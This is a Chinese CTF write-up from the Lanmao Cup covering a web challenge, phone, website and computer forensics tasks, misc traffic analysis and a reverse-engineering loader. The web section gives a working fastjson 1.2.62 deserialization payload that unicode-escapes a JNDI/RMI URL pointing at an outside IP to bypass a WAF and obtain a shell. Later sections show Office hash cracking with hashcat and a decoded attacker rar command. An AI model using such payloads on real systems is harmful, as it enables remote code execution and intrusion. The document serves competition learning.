蓝帽杯WP
蓝帽杯WP
48名 纯靠队友带带 又是re手做misc和取证的一天
web
EZ_gadget
题目直接给了fastjson的版本,1.2.62,有现成的链子可以打,也存在反序列化的点
题目大概分为两步,第一步过hashcode,第二步过正则里的waf。
第一步在某ctf中好像见过,java-hashcode-collisions,直接进行碰撞即可。
第二步
String pattern = ".*rmi.*|.*jndi.*|.*ldap.*|.*\\\\x.*";
Pattern p = Pattern.compile(pattern, 2);
boolean StrMatch = p.matcher(input).matches();
if (StrMatch) {
return "Hacker get out!!!";
}
fastjson在处理json串时会自动进行unicode编码跟十六进制编码,且会自动去掉空格、换行。这里用unicode或空格过字符串匹配。
payload:
http://eci-2zea3ru6vxx8no0ork26.cloudeci1.ichunqiu.com:8888/json?str=Q7ojoxukvEpwrojA
POST:
input={"@type":"org.apache.xbean.propertyeditor.\u004a\u006e\u0064\u0069Converter","AsText":"\u0072\u006d\u0069://47.93.248.221:1099/uhd3xo"}
接收到shell后发现权限不够需要提权,再进行suid提权即可
电子取证
手机取证1
打开附件有一个查看的exe直接点开,已经取证好了,直接开找图片,找到图片后查看分辨率:
手机取证2
得知要找的人名字是姜总,直接去翻找聊天记录
网站取证1
把网站源码拖到d盾里扫一扫
发现assert马,www\runtime\temp\0f71e181346d43e56722aec663e5d4e9.php
password: lanmaobei666
网站取证2
去看database.php,里面的数据库密码是个函数,跟一下。
<?php
function my_encrypt(){
$str = 'P3LMJ4uCbkFJ/RarywrCvA==';
$str = str_replace(array("/r/n", "/r", "/n"), "", $str);
$key = 'PanGuShi';
$iv = substr(sha1($key),0,16);
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
mcrypt_generic_init($td, "PanGuShi", $iv);
$decode = base64_decode($str);
$dencrypted = mdecrypt_generic($td, $decode);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
$dencrypted = trim($dencrypted);
return $dencrypted;
}
直接运行打印一下即可
KBLT123
网站取证3
简单分析了下业务逻辑,在admin的controller下的Channelorder.php中找到对金额的加密代码,其中混淆的key:jyzg123456
网站取证4
把给的sql文件导入数据库中,通过where条件语句找到张宝跟王子豪两人Userid 3和 5之间的记录。再通过时间限制条件处理下数据。
id | order_num | currency | remark | is_create_time | payee_id | payer_id | money
------+--------------+----------+--------+---------------------+----------+----------+----------
142 | 943617668819 | GG币 | | 2022-04-02 01:16:26 | 5 | 3 | mZVymm9t
144 | 588047503620 | GG币 | | 2022-04-02 01:47:16 | 5 | 3 | lpxqlXFo
150 | 597613045539 | GG币 | | 2022-04-02 02:32:02 | 5 | 3 | l5xummto
167 | 368360644631 | GG币 | | 2022-04-02 03:46:25 | 5 | 3 | m5Zwm3Bn
187 | 704008760599 | GG币 | | 2022-04-02 06:53:30 | 5 | 3 | nJhtlGlm
189 | 695829830065 | GG币 | | 2022-04-02 06:57:22 | 5 | 3 | m5tpmGtm
197 | 689591506416 | GG币 | | 2022-04-02 08:09:16 | 5 | 3 | m5ptnGtu
199 | 296524099918 | GG币 | | 2022-04-02 08:29:29 | 5 | 3 | mZlym25r
209 | 202884729901 | GG币 | | 2022-04-02 09:39:39 | 5 | 3 | m5hpnHBu
210 | 955226714946 | GG币 | | 2022-04-02 09:47:09 | 5 | 3 | m5prlm9u
227 | 421623628935 | GG币 | | 2022-04-02 12:33:01 | 5 | 3 | nJlyl2hu
245 | 228102248133 | GG币 | | 2022-04-02 15:05:53 | 5 | 3 | lptummhs
263 | 279069782487 | GG币 | | 2022-04-02 17:33:06 | 5 | 3 | lpxrl21n
317 | 911539892864 | GG币 | | 2022-04-03 00:44:48 | 5 | 3 | mZRpnHBs
358 | 940690024660 | GG币 | | 2022-04-03 06:12:18 | 5 | 3 | mZpxm2lr
371 | 703759626723 | GG币 | | 2022-04-03 08:02:01 | 5 | 3 | m5dtmGls
405 | 250826052511 | GG币 | | 2022-04-03 11:58:42 | 5 | 3 | mpxvlnBv
418 | 699369204729 | GG币 | | 2022-04-03 13:26:10 | 5 | 3 | mJpynHBt
441 | 110783516494 | GG币 | | 2022-04-03 17:08:54 | 5 | 3 | nJZwm2lu
448 | 754012259548 | GG币 | | 2022-04-03 17:41:43 | 5 | 3 | mpdtnWxq
452 | 999734985528 | GG币 | | 2022-04-03 18:54:29 | 5 | 3 | nJdtlmpr
457 | 259291480194 | GG币 | | 2022-04-03 20:24:01 | 5 | 3 | mZtymHBm
468 | 672136643928 | GG币 | | 2022-04-03 22:11:12 | 5 | 3 | nJlslmpp
486 | 995091488940 | GG币 | | 2022-04-04 00:49:53 | 5 | 3 | l5RunW1p
493 | 369911062367 | GG币 | | 2022-04-04 02:05:32 | 5 | 3 | nJxplXFm
494 | 627743356329 | GG币 | | 2022-04-04 02:14:49 | 5 | 3 | lZdpmm1s
496 | 341907225040 | GG币 | | 2022-04-04 02:21:29 | 5 | 3 | mZZwnW9u
541 | 505274522158 | GG币 | | 2022-04-04 09:38:59 | 5 | 3 | mJVrmmhp
558 | 465727738353 | GG币 | | 2022-04-04 11:36:57 | 5 | 3 | lZZwl3Bs
575 | 801973338928 | GG币 | | 2022-04-04 13:50:29 | 5 | 3 | m5xvm2hm
588 | 990446771976 | GG币 | | 2022-04-04 15:55:49 | 5 | 3 | mpZslmpm
595 | 443752577679 | GG币 | | 2022-04-04 17:12:14 | 5 | 3 | mZtrnGtp
598 | 274195438646 | GG币 | | 2022-04-04 17:52:24 | 5 | 3 | lp1rm21t
605 | 389442476686 | GG币 | | 2022-04-04 18:47:30 | 5 | 3 | nJxplmtp
651 | 840764463035 | GG币 | | 2022-04-05 01:50:13 | 5 | 3 | l5twlXFq
667 | 575571956339 | GG币 | | 2022-04-05 04:36:41 | 5 | 3 | lphqmm9s
693 | 369199269150 | GG币 | | 2022-04-05 07:36:54 | 5 | 3 | m51wmG1q
706 | 299510640482 | GG币 | | 2022-04-05 09:39:18 | 5 | 3 | mJlxlWto
731 | 660695028585 | GG币 | | 2022-04-05 13:44:39 | 5 | 3 | lJ1vmXFq
738 | 856482910335 | GG币 | | 2022-04-05 14:17:50 | 5 | 3 | mpVpmW5r
756 | 750042176098 | GG币 | | 2022-04-05 17:02:30 | 5 | 3 | m5lrlGpr
784 | 651691106346 | GG币 | | 2022-04-05 23:00:37 | 5 | 3 | mpxplm9u
786 | 255787712926 | GG币 | | 2022-04-05 23:14:45 | 5 | 3 | lZpxnHFn
791 | 135691319557 | GG币 | | 2022-04-06 00:05:58 | 5 | 3 | nJdymWpm
819 | 788431214978 | GG币 | | 2022-04-06 04:11:14 | 5 | 3 | mJpum3Fo
850 | 851409238798 | GG币 | | 2022-04-06 09:01:35 | 5 | 3 | lpRrmWto
873 | 260951952586 | GG币 | | 2022-04-06 12:48:13 | 5 | 3 | lZtunXBv
885 | 231265027253 | GG币 | | 2022-04-06 15:07:16 | 5 | 3 | lpprnWtt
930 | 262701249039 | GG币 | | 2022-04-06 21:47:06 | 5 | 3 | lJdslnBr
977 | 184134048308 | GG币 | | 2022-04-07 04:24:51 | 5 | 3 | lJZrnWpm
979 | 391202213852 | GG币 | | 2022-04-07 04:29:53 | 5 | 3 | l5Zrm21m
1004 | 325182412061 | GG币 | | 2022-04-07 08:23:24 | 5 | 3 | lJdul2hm
1009 | 145997703051 | GG币 | | 2022-04-07 08:52:54 | 5 | 3 | mphylG9q
1029 | 812286624781 | GG币 | | 2022-04-07 11:25:32 | 5 | 3 | lZhpm2pp
1051 | 932860292032 | GG币 | | 2022-04-07 15:30:43 | 5 | 3 | lZ1qnW1s
1074 | 960800718320 | GG币 | | 2022-04-07 18:13:02 | 5 | 3 | nJ1tlHFp
1079 | 309703180719 | GG币 | | 2022-04-07 18:34:31 | 5 | 3 | mZxqm2tp
1080 | 867260227199 | GG币 | | 2022-04-07 18:43:45 | 5 | 3 | mZdsm21t
1088 | 489129121639 | GG币 | | 2022-04-07 20:38:54 | 5 | 3 | mpRvlG9o
1094 | 640176750934 | GG币 | | 2022-04-07 21:18:54 | 5 | 3 | mJVqlmhv
1097 | 271657786070 | GG币 | | 2022-04-07 21:39:16 | 5 | 3 | mJRwlHBq
1119 | 895632760061 | GG币 | | 2022-04-08 00:14:36 | 5 | 3 | l5dtmWtt
1164 | 291179495316 | GG币 | | 2022-04-08 07:31:35 | 5 | 3 | mZdylHFt
1170 | 588053366224 | GG币 | | 2022-04-08 07:44:05 | 5 | 3 | l5RqlWxn
1171 | 308892834659 | GG币 | | 2022-04-08 07:50:45 | 5 | 3 | mZ1um3Fs
1181 | 712419993689 | GG币 | | 2022-04-08 08:43:06 | 5 | 3 | lJ1rnWhu
1185 | 240497645432 | GG币 | | 2022-04-08 09:19:05 | 5 | 3 | m5pulWhv
1193 | 519564426335 | GG币 | | 2022-04-08 09:57:45 | 5 | 3 | lptrnW1u
1218 | 178274213935 | GG币 | | 2022-04-08 13:23:04 | 5 | 3 | m5xynWxn
1243 | 621845480580 | GG币 | | 2022-04-08 16:30:05 | 5 | 3 | lpRynGtr
1246 | 984927062919 | GG币 | | 2022-04-08 17:09:06 | 5 | 3 | mpxulGlm
1255 | 508590678286 | GG币 | | 2022-04-08 18:22:27 | 5 | 3 | nJdslm9r
1261 | 165679472688 | GG币 | | 2022-04-08 19:09:09 | 5 | 3 | lJhslHBq
1272 | 398566701812 | GG币 | | 2022-04-08 22:03:28 | 5 | 3 | nJpwnWhu
1299 | 391669188513 | GG币 | | 2022-04-09 01:22:34 | 5 | 3 | mptql2tv
1328 | 308977433705 | GG币 | | 2022-04-09 06:27:14 | 5 | 3 | l51xmmlp
1347 | 128173141307 | GG币 | | 2022-04-09 08:52:54 | 5 | 3 | mZVymXFn
1375 | 315017222711 | GG币 | | 2022-04-09 14:06:48 | 5 | 3 | lJhqnW5q
1390 | 698730100843 | GG币 | | 2022-04-09 16:15:03 | 5 | 3 | m5ppmGpr
1394 | 454661923665 | GG币 | | 2022-04-09 16:45:28 | 5 | 3 | mZlqm21t
1446 | 770844458971 | GG币 | | 2022-04-09 23:54:25 | 5 | 3 | mpZslWxt
1461 | 336049994728 | GG币 | | 2022-04-10 01:28:10 | 5 | 3 | mJ1pnHFm
1503 | 900217499326 | GG币 | | 2022-04-10 08:16:00 | 5 | 3 | l5drlXBp
1515 | 541334504409 | GG币 | | 2022-04-10 10:10:06 | 5 | 3 | mJlvmW1u
1520 | 296235199037 | GG币 | | 2022-04-10 11:06:19 | 5 | 3 | mZtxlG5t
1522 | 961454505603 | GG币 | | 2022-04-10 11:21:05 | 5 | 3 | nJtsnHFn
1540 | 660586887840 | GG币 | | 2022-04-10 12:58:19 | 5 | 3 | l5Rvm29o
1542 | 521373859771 | GG币 | | 2022-04-10 13:02:35 | 5 | 3 | m5xvlWxv
1558 | 690490467926 | GG币 | | 2022-04-10 15:05:50 | 5 | 3 | m5Zrl2xm
1615 | 915839175755 | GG币 | | 2022-04-11 01:02:35 | 5 | 3 | mZlwlG1u
1667 | 731272590033 | GG币 | | 2022-04-11 08:17:29 | 5 | 3 | nJpvlWtr
1676 | 266051494236 | GG币 | | 2022-04-11 08:51:14 | 5 | 3 | mJxym25s
1677 | 952748053664 | GG币 | | 2022-04-11 08:51:59 | 5 | 3 | lpVqnWxv
1721 | 432188794976 | GG币 | | 2022-04-11 14:00:17 | 5 | 3 | mZVvl3Fq
1730 | 923396563975 | GG币 | | 2022-04-11 16:47:41 | 5 | 3 | lZVtlW5m
1731 | 188214551206 | GG币 | | 2022-04-11 16:48:30 | 5 | 3 | lZRqlGhn
1737 | 562343715793 | GG币 | | 2022-04-11 17:44:21 | 5 | 3 | nJxqm2hn
1788 | 723775062575 | GG币 | | 2022-04-11 23:59:53 | 5 | 3 | nJVtl21s
1814 | 437640662866 | GG币 | | 2022-04-12 04:52:14 | 5 | 3 | lJdumWlq
1847 | 261181748262 | GG币 | | 2022-04-12 08:07:42 | 5 | 3 | mJtxmGtp
1866 | 520680592708 | GG币 | | 2022-04-12 10:10:57 | 5 | 3 | mZxsnHFv
1893 | 846224640296 | GG币 | | 2022-04-12 13:45:48 | 5 | 3 | lpdtl2xn
1901 | 526823225486 | GG币 | | 2022-04-12 14:27:33 | 5 | 3 | mphqlm5p
1919 | 293881600039 | GG币 | | 2022-04-12 17:33:24 | 5 | 3 | lJdxlGpn
1986 | 252943398463 | GG币 | | 2022-04-13 02:42:54 | 5 | 3 | lpVvlHFu
2050 | 841971039165 | GG币 | | 2022-04-13 10:41:00 | 5 | 3 | lJhvmHBn
2051 | 113568559627 | GG币 | | 2022-04-13 10:46:38 | 5 | 3 | l5xunGtv
2059 | 884517377766 | GG币 | | 2022-04-13 12:12:35 | 5 | 3 | lZRul2pt
2065 | 429478659168 | GG币 | | 2022-04-13 12:47:08 | 5 | 3 | mpdqnGxu
2081 | 701817809209 | GG币 | | 2022-04-13 15:06:14 | 5 | 3 | l5Zxlmho
2093 | 648527268061 | GG币 | | 2022-04-13 17:34:17 | 5 | 3 | lJppmWhq
2118 | 346397347560 | GG币 | | 2022-04-13 21:20:16 | 5 | 3 | nJVylWpp
2121 | 598070757264 | GG币 | | 2022-04-13 21:49:38 | 5 | 3 | m5VxnWlr
2144 | 385475471817 | GG币 | | 2022-04-14 00:45:19 | 5 | 3 | lpdsnGtq
2152 | 860407002245 | GG币 | | 2022-04-14 02:02:07 | 5 | 3 | mZ1tnGpt
2175 | 876730476520 | GG币 | | 2022-04-14 07:03:09 | 5 | 3 | mJVqmmtq
2226 | 705271590445 | GG币 | | 2022-04-14 12:55:39 | 5 | 3 | l5hslWhm
2260 | 778005846695 | GG币 | | 2022-04-14 17:39:20 | 5 | 3 | lZZtl21r
2265 | 429472355879 | GG币 | | 2022-04-14 19:00:35 | 5 | 3 | nJlumGlm
2279 | 837352974915 | GG币 | | 2022-04-14 21:44:54 | 5 | 3 | lJhsmW9t
2304 | 206040245526 | GG币 | | 2022-04-15 01:40:08 | 5 | 3 | lZZym25s
2347 | 214154454225 | GG币 | | 2022-04-15 08:01:16 | 5 | 3 | l5tpnHBt
2353 | 539433927736 | GG币 | | 2022-04-15 09:22:24 | 5 | 3 | nJVunG1q
2371 | 614328206854 | GG币 | | 2022-04-15 12:43:40 | 5 | 3 | mJdtlHFu
2373 | 744073817220 | GG币 | | 2022-04-15 12:59:32 | 5 | 3 | mpVtlnFp
2386 | 472576318606 | GG币 | | 2022-04-15 15:44:12 | 5 | 3 | mplrnG1t
2393 | 905356397967 | GG币 | | 2022-04-15 16:21:55 | 5 | 3 | mJ1ylHBr
2408 | 202047690664 | GG币 | | 2022-04-15 18:52:56 | 5 | 3 | nJhynG5m
2419 | 660557237414 | GG币 | | 2022-04-15 20:02:34 | 5 | 3 | mplymG1r
2518 | 284536429033 | GG币 | | 2022-04-16 09:06:00 | 5 | 3 | lJtxlGxo
2537 | 846259865921 | GG币 | | 2022-04-16 13:46:20 | 5 | 3 | lpRxnGlm
2539 | 914271862202 | GG币 | | 2022-04-16 13:54:39 | 5 | 3 | mZxwnG5s
2569 | 230868458507 | GG币 | | 2022-04-16 18:43:11 | 5 | 3 | mZptnWpn
2592 | 580327294210 | GG币 | | 2022-04-16 22:20:02 | 5 | 3 | mJZylGxq
2601 | 113725129935 | GG币 | | 2022-04-16 23:57:42 | 5 | 3 | mZZvm3Fo
2614 | 125295831828 | GG币 | | 2022-04-17 01:33:33 | 5 | 3 | lJdxnW9t
2622 | 304246628524 | GG币 | | 2022-04-17 02:02:29 | 5 | 3 | lZtxmXFv
2636 | 949878301272 | GG币 | | 2022-04-17 04:33:37 | 5 | 3 | nJxtlXFm
2642 | 236806705755 | GG币 | | 2022-04-17 05:17:45 | 5 | 3 | mJZumW1r
2644 | 219250916132 | GG币 | | 2022-04-17 05:36:23 | 5 | 3 | nJ1tmG1p
2653 | 856797267940 | GG币 | | 2022-04-17 06:50:17 | 5 | 3 | mplslmpu
2709 | 829562956572 | GG币 | | 2022-04-17 12:14:25 | 5 | 3 | lJZxlG5p
2751 | 904086289177 | GG币 | | 2022-04-17 18:58:49 | 5 | 3 | nJtxmXBq
2796 | 568416612736 | GG币 | | 2022-04-18 00:23:41 | 5 | 3 | lZdxmmtq
2817 | 987519535765 | GG币 | | 2022-04-18 02:35:20 | 5 | 3 | lJdrlG1o
2880 | 657461012245 | GG币 | | 2022-04-18 11:18:57 | 5 | 3 | mpZtmmlm
2906 | 278546157230 | GG币 | | 2022-04-18 13:32:32 | 5 | 3 | mJVxnGpm
2921 | 999235838187 | GG币 | | 2022-04-18 14:45:06 | 5 | 3 | mJVwmWxu
2935 | 861319935688 | GG币 | | 2022-04-18 16:24:05 | 5 | 3 | mplslWps
这里的金额是加密过的,简单写个脚本解密一下:
header("Content-Type: text/html;charset=utf-8");
$handle = fopen('./money.txt', 'r'); //打开文件
if (!$handle) { //判断文件是否打开成功
echo '文件打开失败!';
}
while (false !== ($char = fgets($handle,1024))) { //循环读取文件内容
echo decrypt($char)."\n";
}
fclose($handle); //关闭文件
?>
再从数据库中取到每天的汇率
INSERT INTO "public"."info_bargain" VALUES ('1', 'RMB', 0.05, '2022-04-01 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('2', 'RMB', 0.04, '2022-04-02 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('3', 'RMB', 0.06, '2022-04-03 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('4', 'RMB', 0.05, '2022-04-04 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('5', 'RMB', 0.07, '2022-04-05 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('6', 'RMB', 0.10, '2022-04-06 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('7', 'RMB', 0.15, '2022-04-07 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('8', 'RMB', 0.17, '2022-04-08 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('9', 'RMB', 0.23, '2022-04-09 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('10', 'RMB', 0.22, '2022-04-10 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('11', 'RMB', 0.25, '2022-04-11 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('12', 'RMB', 0.29, '2022-04-12 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('13', 'RMB', 0.20, '2022-04-13 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('14', 'RMB', 0.28, '2022-04-14 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('15', 'RMB', 0.33, '2022-04-15 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('16', 'RMB', 0.35, '2022-04-16 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('17', 'RMB', 0.35, '2022-04-17 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('18', 'RMB', 0.37, '2022-04-18 00:00:00');
写个简单py脚本处理下得到最终RMB:15758353.760000002
sum = 0
while True:
a = float(input())
b = a * 0.17
sum += b
print(sum)
程序分析1
re手自我修养(
安装上后去设置里面看包名
程序分析2
jadx看一眼
程序分析3
就这一个勉强算的上密文
程序分析4
好险没试出来 就那么几个类
就是a
有thread啥的
计算机取证1
内存镜像用vol解
解7f21caca5685f10d9e849cc84c340528 md5即可
anxinqi
计算机取证2
取证大师
pid 2192
顺便把两个密钥dump下来
计算机取证3
取证大师挂载磁盘镜像 用bitlocker密钥解密一下
拿到两个txt(其中一个是镜像 一个是密码本) 一个word 一个ppt
用这个将ppt转换hash
http://www.wendanghuifu.com/freetools/office2john.html
查网址知道office2007对应
https://hashcat.net/wiki/doku.php?id=example_hashes
hashcat -m 9400 -a 0 hash.txt pass.txt -o output.txt
word同理
$office$*2007*20*128*16*ae5cec7759d56eba49f6e923a4657c6c*5c91c78a0990d6c1791b3d6577056ada*a1b73a76fb87442b4ecc8f9b3702784312f8a7e2:287fuweiuhfiute
$office$*2007*20*128*16*86ba49293df8e9dfba55e68b7b8e132d*2a264ead0c29fb1bfadbc763491f873b*660c537a244f02d816fbd299f73e60b7c68212c6:688561
解出两个密码 打开ppt即为flag
计算机取证4
选择前面拿到的key
解密镜像
再次取证大师装载刚才解密的镜像
哈哈哈有密码
john爆破
991314 解压即为flag
MISC
misc1
payload分析 里面是base64实现命令执行
base64解密上一个payload最后的参数
YNY2QgL2QgImM6XFxXaW5kb3dzXFxUZW1wIiZyYXIuZXhlIGEgLVBTZWNyZXRzUGFzc3cwcmRzIDEucmFyIDEudHh0JmVjaG8gZWZhOTIzYmE1MDQmY2QmZWNobyAxYTRiZTg4MTVlZjg=
去掉前两位再base64
cd /d "c:\Windows\Temp"&rar.exe a -PSecretsPassw0rds 1.rar 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8
拿到压缩包密码SecretsPassw0rds
流量包导出 解出压缩包后
提交ntlm即可
misc2
和misc1差不多 也是找到压缩命令的payload
也是记得把头两位去了
拿到密码解压压缩包
https://www.freebuf.com/sectool/176876.html
按照这个文章打就行
然后注意是上一个密码的hash 找hash02提交即可
RE 复现
LOADER
是复现 当时做的比较急 函数只分析出了部分加减好像是
现在重新做一遍
主函数 VirtualProtect
BOOL VirtualProtect(
LPVOID lpAddress,
DWORD dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);
lpAddress,要改变属性的内存起始地址。
dwSize,要改变属性的内存区域大小。
flNewProtect,内存新的属性类型,设置为PAGE_EXECUTE_READWRITE(0x40)时该内存页为可读可写可执行。
pflOldProtect,内存原始属性类型保存地址。
修改内存属性成功时函数返回非0,修改失败时返回0。
直接dump出byte
exeinfo识别
010改回amd64和pe64即可
接下来黑盒动调 分析函数逻辑即可 (别急慢慢来)
